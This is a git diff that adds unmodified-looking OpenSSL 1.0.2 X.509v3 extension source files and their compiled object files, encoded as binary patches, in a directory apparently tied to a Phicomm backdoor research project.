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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pcia.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pcia.c
new file mode 100644
index 0000000..350b398
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pcia.c
@@ -0,0 +1,56 @@
+/* v3_pcia.c -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Contributed to the OpenSSL Project 2004 by Richard Levitte
+ * (richard@levitte.org)
+ */
+/* Copyright (c) 2004 Kungliga Tekniska Högskolan
+ * (Royal Institute of Technology, Stockholm, Sweden).
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * 3. Neither the name of the Institute nor the names of its contributors
+ *    may be used to endorse or promote products derived from this software
+ *    without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE INSTITUTE AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE INSTITUTE OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/x509v3.h>
+
+ASN1_SEQUENCE(PROXY_POLICY) =
+        {
+        ASN1_SIMPLE(PROXY_POLICY,policyLanguage,ASN1_OBJECT),
+        ASN1_OPT(PROXY_POLICY,policy,ASN1_OCTET_STRING)
+} ASN1_SEQUENCE_END(PROXY_POLICY)
+
+IMPLEMENT_ASN1_FUNCTIONS(PROXY_POLICY)
+
+ASN1_SEQUENCE(PROXY_CERT_INFO_EXTENSION) =
+        {
+        ASN1_OPT(PROXY_CERT_INFO_EXTENSION,pcPathLengthConstraint,ASN1_INTEGER),
+        ASN1_SIMPLE(PROXY_CERT_INFO_EXTENSION,proxyPolicy,PROXY_POLICY)
+} ASN1_SEQUENCE_END(PROXY_CERT_INFO_EXTENSION)
+
+IMPLEMENT_ASN1_FUNCTIONS(PROXY_CERT_INFO_EXTENSION)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pcia.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pcia.o
new file mode 100644
index 0000000000000000000000000000000000000000..94c8ea2e12fe5a62c44c10659368af9fbd27e38d
GIT binary patch
literal 4240
zcmbuC-H+Qu5WqK=(jHLgT>()jw0`14P%F6>6%a+f3%)c}l$cy9asuS|awZAni^QRK
z1wkZ0LP$tFAOzy&9zf~?LcAdH7>U1u|9}U0M7$xSGP9nEHyayW%SfA<`R&Z?de>e%
zAK1msrBq6=q{NFN@|X&-ay+svX<Fi>SQUSrIP>@A&+b9;2mXZq1DbzH^PkcD+s}6@
z<=VEJvny4%P}(fJcCBicwhHBv7&II&XchflGic@dy-_gq+Py#whW)*Lr{8He_C=WN
zl#7MjwirlO^m@&)*YwGqt;Gt?Sdk^gMpN(SZeB~h|5o$4-eL9fVFM2t$JfE(iS_fj
z-1Ej0S9iv}U~D{Ro;Ne+vKPnF&Az{uF*6sQ3~^ZL2q;{eJD}xDR|Txg6j>S?%Kf1d
zsp}Py+FMDTK7MTZbC?X~JVJfEwx}~P?4=l1i(#D@Hi=<h#IPG0BX>dJIvx>!-dyMa
zke=Ob^S$ZWYUmtSYEja1HRJfv1$Z}*l!$iIQ6ka`XZ$q9*9pwWW3@#|3+3=oy3;~F
z_X-Kkw76@5SwK!I>w|lZ@-nnlaa367fIJ&2;eqBDLQ-8z;2#6W`kcf1%Y^uEDc%5$
z!tp;Tw(OvvUqEC14EY@YEBI_vmsG#OFUDI0Ic5oNAiQ1{zTUIIG2YSQFA=Y6{8i!u
zjb8`OV^Nn>pC<6H6S#QiygO*LJ+nclY|Ihuj{LXXAecLbneDE%-MQmgb=-C!+<dXT
zv0ik`o10s9)vc~?6m3_mZ<Vsp>vvr!AlhrY^F^X==$aq5=U-E@(VH9bjiK)={nCx*
z7;|y|aoI5YXlA#T8qF&v&y6NoC{^veUBQKt*IeGXV&|%no2$Z_ZB;9UQXZiY$7r+h
zy>tTFKQ}{pFo8dwz%M57yuu#>o9n-lz?%sipI;Q5r&@<k7(5YIp>chFM<BmX;dqXr
zAjhv2j(-6m2y(o3=0$`cdi~czEV)|0qj0tUdkR<U^D_sJ)7+_>p?Ku@j%0Dj;P^WE
z1BGL}{PF^QO5+ccZz%jxvQb%N^SD{^FDo4H6P7(PIQ|Ox6NR548`S~X9KTIIzekau
zC5Fl%8}}U>%LOu+^E&c8nHv<x`^B8sm)DKCMe!ezX6}&xmB#Djf3I<_E6mY;H}G~q
z2g6Xe*c$pB&kX#%K$yE;;0beQG!o{pj}C@s%`CVWBnep1X?FSzud~R7+30t>K78q#
zy?)@E@KJSc6nKrd$Zz(>CVT@A{9&+9*?tR74zKIe)c=<<ARG5CdP9ZftWb#wX;v7k
z%4u-$8M9Of_A-5<Oeg{GJv0f=?(fHl^Y<gTQl_MJrH_y20@l3Ue0)x@<{C6rrsULB
z2sV$;+9sxtZ%_a~XI#c$gR})YZv8&FGYqJQN}ln!NBa7`4h)CV$3LL)f24d?1{<Vn
zpyS5>oyMP19PS^Et&jgEFdQlaO%(?pK#-?GHT$J$$sB|uXv}6oV7yEDDnnb3{SX+w
z3-#~`0R#F};rTQB1`MpJ=N}OGnFC4d`S`sVw|+P1lXyybxPJKc%=xE?$Bm6$HQrFt
oE5PoBrsv}}aVVHGsnG-dgSKFrE8o3w`7Qcu@ZGFpXz2O>0!;4C0ssI2

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pcons.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pcons.c
new file mode 100644
index 0000000..cfccb97
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pcons.c
@@ -0,0 +1,139 @@
+/* v3_pcons.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2003 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/conf.h>
+#include <openssl/x509v3.h>
+
+static STACK_OF(CONF_VALUE) *i2v_POLICY_CONSTRAINTS(const X509V3_EXT_METHOD
+                                                    *method, void *bcons, STACK_OF(CONF_VALUE)
+                                                    *extlist);
+static void *v2i_POLICY_CONSTRAINTS(const X509V3_EXT_METHOD *method,
+                                    X509V3_CTX *ctx,
+                                    STACK_OF(CONF_VALUE) *values);
+
+const X509V3_EXT_METHOD v3_policy_constraints = {
+    NID_policy_constraints, 0,
+    ASN1_ITEM_ref(POLICY_CONSTRAINTS),
+    0, 0, 0, 0,
+    0, 0,
+    i2v_POLICY_CONSTRAINTS,
+    v2i_POLICY_CONSTRAINTS,
+    NULL, NULL,
+    NULL
+};
+
+ASN1_SEQUENCE(POLICY_CONSTRAINTS) = {
+        ASN1_IMP_OPT(POLICY_CONSTRAINTS, requireExplicitPolicy, ASN1_INTEGER,0),
+        ASN1_IMP_OPT(POLICY_CONSTRAINTS, inhibitPolicyMapping, ASN1_INTEGER,1)
+} ASN1_SEQUENCE_END(POLICY_CONSTRAINTS)
+
+IMPLEMENT_ASN1_ALLOC_FUNCTIONS(POLICY_CONSTRAINTS)
+
+static STACK_OF(CONF_VALUE) *i2v_POLICY_CONSTRAINTS(const X509V3_EXT_METHOD
+                                                    *method, void *a, STACK_OF(CONF_VALUE)
+                                                    *extlist)
+{
+    POLICY_CONSTRAINTS *pcons = a;
+    X509V3_add_value_int("Require Explicit Policy",
+                         pcons->requireExplicitPolicy, &extlist);
+    X509V3_add_value_int("Inhibit Policy Mapping",
+                         pcons->inhibitPolicyMapping, &extlist);
+    return extlist;
+}
+
+static void *v2i_POLICY_CONSTRAINTS(const X509V3_EXT_METHOD *method,
+                                    X509V3_CTX *ctx,
+                                    STACK_OF(CONF_VALUE) *values)
+{
+    POLICY_CONSTRAINTS *pcons = NULL;
+    CONF_VALUE *val;
+    int i;
+    if (!(pcons = POLICY_CONSTRAINTS_new())) {
+        X509V3err(X509V3_F_V2I_POLICY_CONSTRAINTS, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    for (i = 0; i < sk_CONF_VALUE_num(values); i++) {
+        val = sk_CONF_VALUE_value(values, i);
+        if (!strcmp(val->name, "requireExplicitPolicy")) {
+            if (!X509V3_get_value_int(val, &pcons->requireExplicitPolicy))
+                goto err;
+        } else if (!strcmp(val->name, "inhibitPolicyMapping")) {
+            if (!X509V3_get_value_int(val, &pcons->inhibitPolicyMapping))
+                goto err;
+        } else {
+            X509V3err(X509V3_F_V2I_POLICY_CONSTRAINTS, X509V3_R_INVALID_NAME);
+            X509V3_conf_err(val);
+            goto err;
+        }
+    }
+    if (!pcons->inhibitPolicyMapping && !pcons->requireExplicitPolicy) {
+        X509V3err(X509V3_F_V2I_POLICY_CONSTRAINTS,
+                  X509V3_R_ILLEGAL_EMPTY_EXTENSION);
+        goto err;
+    }
+
+    return pcons;
+ err:
+    POLICY_CONSTRAINTS_free(pcons);
+    return NULL;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pcons.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pcons.o
new file mode 100644
index 0000000000000000000000000000000000000000..e1b2eea3f04547110264e81f51a0d17d214bcc32
GIT binary patch
literal 4624
zcmchZU2GIp6o7BLMOMY36oW++M{G<9Fz&X1v{ACtvhCCi{oNw}!*)B+mF^F-v!yi#
zNh*d-DWVVZz=K9(;-k?gd5|XH1M$HpqtR%HF$%#%4KW&Htmn*}v%Q_}CPouaGIP%T
z?z!ilIdkXUc`<Hw)z;JqmKw2BEVP&kapArNJLZ`&(I8fdJ1f`!p(l*lr;!aAr8~y-
zkB!F6c5`;LDQuJyO<}Y2?M>`7W(sJNE1_NBG<~h{fPU~QMxxGJ=<m0;p;>P0&+2>h
z;hxfGdSZA;@ArcAl&%?P=8Eg%(YfgL%R0D!^cvi*Y=E2RaO(zG(XY(eNtpj954C-<
z^87`hrEi!Rv))YROdhiS*ew0#`I)8f&&;`NxRWT%w%RQHWl%8in3%tM`|ap;Na6Bx
z5H^s2ITH_GxeJq+8{km0UOnfF^~TJwF#MJ`<zee~bI<e(O<_^o)HD55lPEU%Plovh
z1DAe?N5Aui?Kev|4jj@C>WB2hx^;EXK2c0Nwi=(zkEc^<SMAS%o)SITvGho}sqRkZ
z^Xcp{;rQ<CP0nfG*>ADy=85EZ(QX%;v&jsof}L{Hxoo@W?=yQk_gS5Ny+esXy{9)Z
z1o?{cTB`S23%A+@)3bv8-2G~$#mJrigD(BUIoOZW4Obi2-Pzf$HV=;!vu;ss(^|F2
zmgtj3uNghn644@CH~QEQPzMTYvkb28-eCcCn?n|Y3*~-aiJIpJMa^V=&AJuK!xtcl
zCg2ZI-!rJYl=^eEhSE44>Q*8rltx{t?@+>C>|Nx??*R4Q082o7oY)q8NQn1JZHLl$
zKGdP8vvqN$`P?#HiM)K5uI!jz-l4>5KTwPTrGG#%bR{;S?AWD5bfp=bVNi!ZImN4_
zaEdzd%Y3E2P<d4??hTcz669F1r4sV0x|pwkW~~(8s~xb%h~wvt;?=-6VOIRO7fU-d
zYsA7T=$E=f5|=Q<xmRwM?U2B%mP$xSn=*Cdd-7Kc0aE)sy-YMN#^NyXCjvZ0JRaa<
z#M1$uA-+Gr9pWPaj?Iv`X9+zCgx8_mIa`Il1-t<&&F_iFeh7S(^j>yQuurSR`I_Qz
z{v7AmD*kn_K-q^vd#a%dUt5K5sKPf^;XAAFfhs%+9P1FHB>ndXjfqw(pUPzmT1uo_
zCaenE_e4v&5?<<Q73>q1>k7^6jNmPbw-&s$;%z(Lw&HD@u)58@4&Ai+y1Itq2`iy@
zm~l(&-4<!v(`qG0M=kGkvC>($!hvFC?UR*o+7<dxZ`4Y=cBY!oQOC9=FRvLN9JKO9
z*RmZa=ZL~_D_hK<@^TOb*GXmaoZB(mm2$(8n5{R`8cn)MKQ<hD@$UE_Wa8D=J990p
zvg;(_nF>POP45BraiPHV=e#eE6UUwE0f}!Vj{Ykp-bOs=KOp(9mHd-c_$et4?hTyJ
z8xnt5;_pj*y~M9c{1J(NLLBqQ?}g)kNgVT6C4Q4Q`md7s&%}fNd_W+7RPtA0-J>9v
z^KT`N@f+aceA*?xTH=Pp@vLS4-BSDw5}%T|Jnu^qUnlwR0UHJLd=M^<e-t4Iay-YG
z^PYp@<lQp@Z4~7Aui)>y@YjtH1Uaq;meXV)$6BzQC4)JicYJPed_FH!$sf;1mKYiA
z&*zAokL<6KKjtFm!~V>9pFbGz=Y2aL;GDnE3R4+3IRe^sd_BgNV~-~_*PetO%=?tJ
zkwQUeP7WLB9@St+^PD^a7IbRkxm0p|DHmEQm&w?$foa*CYisb+wx!@EQ^%=&EL+s_
zPA+dd?i7u-$E>3c{7qBp|4FGZ8fzZ>BZ&b+xrm*T1eyZZCa$@d<b!6OHm(@G9Ndd=
zY#2L1czxhLhCGB&lFx$^QC|>m297cR?f58+#h5K{$-?uWks;VTKWkj4Xb0y%LeKqf
zV7wY=$Dm!Qe(%w*-6Z*A{qP+H>vsrPrTJA#sGr8OQrRHA7j&iho9P$w2>IdsICpS<
z{9bT=-cP{vBv12iVnCYf#u|>ea!qB|OTmH$#<TA<7|Y?Jax)fh(s;E@e1r36d<hK9
zB{+VL#?P@M>EQU+fmf>E*$VZ;zi%GT>%Y?6IMrzk3NlG~)PubSuHbn5%*X|-1^FF|
b0&<cI?KhXy8qds1<8M;_@6b3_fpFq)eDi??

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pku.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pku.c
new file mode 100644
index 0000000..dd01c44
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pku.c
@@ -0,0 +1,114 @@
+/* v3_pku.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/x509v3.h>
+
+static int i2r_PKEY_USAGE_PERIOD(X509V3_EXT_METHOD *method,
+                                 PKEY_USAGE_PERIOD *usage, BIO *out,
+                                 int indent);
+/*
+ * static PKEY_USAGE_PERIOD *v2i_PKEY_USAGE_PERIOD(X509V3_EXT_METHOD *method,
+ * X509V3_CTX *ctx, STACK_OF(CONF_VALUE) *values);
+ */
+const X509V3_EXT_METHOD v3_pkey_usage_period = {
+    NID_private_key_usage_period, 0, ASN1_ITEM_ref(PKEY_USAGE_PERIOD),
+    0, 0, 0, 0,
+    0, 0, 0, 0,
+    (X509V3_EXT_I2R)i2r_PKEY_USAGE_PERIOD, NULL,
+    NULL
+};
+
+ASN1_SEQUENCE(PKEY_USAGE_PERIOD) = {
+        ASN1_IMP_OPT(PKEY_USAGE_PERIOD, notBefore, ASN1_GENERALIZEDTIME, 0),
+        ASN1_IMP_OPT(PKEY_USAGE_PERIOD, notAfter, ASN1_GENERALIZEDTIME, 1)
+} ASN1_SEQUENCE_END(PKEY_USAGE_PERIOD)
+
+IMPLEMENT_ASN1_FUNCTIONS(PKEY_USAGE_PERIOD)
+
+static int i2r_PKEY_USAGE_PERIOD(X509V3_EXT_METHOD *method,
+                                 PKEY_USAGE_PERIOD *usage, BIO *out,
+                                 int indent)
+{
+    BIO_printf(out, "%*s", indent, "");
+    if (usage->notBefore) {
+        BIO_write(out, "Not Before: ", 12);
+        ASN1_GENERALIZEDTIME_print(out, usage->notBefore);
+        if (usage->notAfter)
+            BIO_write(out, ", ", 2);
+    }
+    if (usage->notAfter) {
+        BIO_write(out, "Not After: ", 11);
+        ASN1_GENERALIZEDTIME_print(out, usage->notAfter);
+    }
+    return 1;
+}
+
+/*-
+static PKEY_USAGE_PERIOD *v2i_PKEY_USAGE_PERIOD(method, ctx, values)
+X509V3_EXT_METHOD *method;
+X509V3_CTX *ctx;
+STACK_OF(CONF_VALUE) *values;
+{
+return NULL;
+}
+*/
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pku.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pku.o
new file mode 100644
index 0000000000000000000000000000000000000000..d9df0b2486621a7b2c295718dc715335d72dda20
GIT binary patch
literal 4120
zcmc&$TWefZ6yB3*ZM1co#9L~;9Pxse_ArxFv?<n^B$G^VnuJ_vZ7nC0<fIv!%uHv_
z*hH}wB0?;IK53yKf`~r(;)5j*66k~CgCHXQ1og>E@kNBXzJ1o3?AbE|MIT(S&tB_W
z-&$*5&fe#|lg<vcMIuThqK>L<OHie*?B3RsT1~1h)v0doedMp{%=%A>t@ZCFGaGlq
zm07=;*?1n>@yz<~ziMdhhzj~P_rM#vYMx8IHFfQ+b`>1iY-_^OE@wM-6XOX}U#hfA
zhLhJY_EV>?V^}<z-w4se%xv5T)v#Z(Y&~Y}S5H1$QKQAc>Gv0kWxvl+2OMpu76QLa
z=J+e=SH0=U)NtAxPfv`D4XQ#h2+7bi4cTQaJ75@sIhtbo#Wy9&|J1MFW?kXQeA`>a
z4G#?TIZsc|RtrJZIqdej@q>vMs@hCk=!v`WL(hb8m|zEWSeu>HhDWCrt=kr`C^g8v
zVW%Q*PN>LAM`Zt=UG0}?5Kj>P5c@tvpN@6B*OrNOuSF+fPFpF~JrwIm#oCd3ka@BP
z=ub4kmYQG}EsV{E4(qZ*{c)?oK|r+jmehNrwOQIYR-jR$dX?(&yU1)a^6Rx=N>trZ
zPbSNu7E#-~H*PSZ25!JKO5<`c98rby-Y8L}uZcRxVQpcT>*c66cN#MY{R52K5gEq2
zLR#&4jB$Mh)X-3gDy&kyOpqz>gXvjpfmd4KZ@0j&5Z*<zlKqfcUl87D?8}Q}L#|U3
zjt2Pg1NF%B8Qa47g>2E;rMo}r3I10M3THRHprV`neT0Mmjm3|*;J@4gKTbI2mE=5F
zM=fvkdZn{fcTVMd%3kBG+JJZ!|C|>D%FPbM@krp&gGVnOhm<#*9qUhJy|JO8$@G*r
zmFmx?J=H%l=9S9%La?CK^W}WttJLIZ!W&MHrYBO_k(24csgYypkfr8(^0zgbd=O@#
zbjuzE(KP0p1nNqfL;l8(hga~=8+l+gPJE&4^N@9-ZPT6sjY+Snzv@*hxih|3^2_<+
zyk2hEV|;&b3je+p%7faAyF#g$fj`bTZXDdT!q=ZlvccbL;QEtFHuyMe!Vk}7h~IDE
zr$~n&55^|^Ie;W~o^v6r`JJQ-{{rJS|9t~D>waY9={EA<{6R1t6aQMHjrjL1@J|@W
zc=l0~aeisw`wblD8v_2r)P(;dKoa1OQWISEk&czRlbT4J72voVA7fkAA2{YEa+ww2
zn6rp*Bu_6p9PWXO4k(ESiSXq;FzY&+5k5pmO|!1>1(*BrHI5Zr?z@tO%f0rlh0Fb=
z+{)^5kej7GD2M%`Xk~vX=LY@?T`u#vAgA2fN=3QlA`H+IE?qX7q!H4{=`I!La!ZZ4
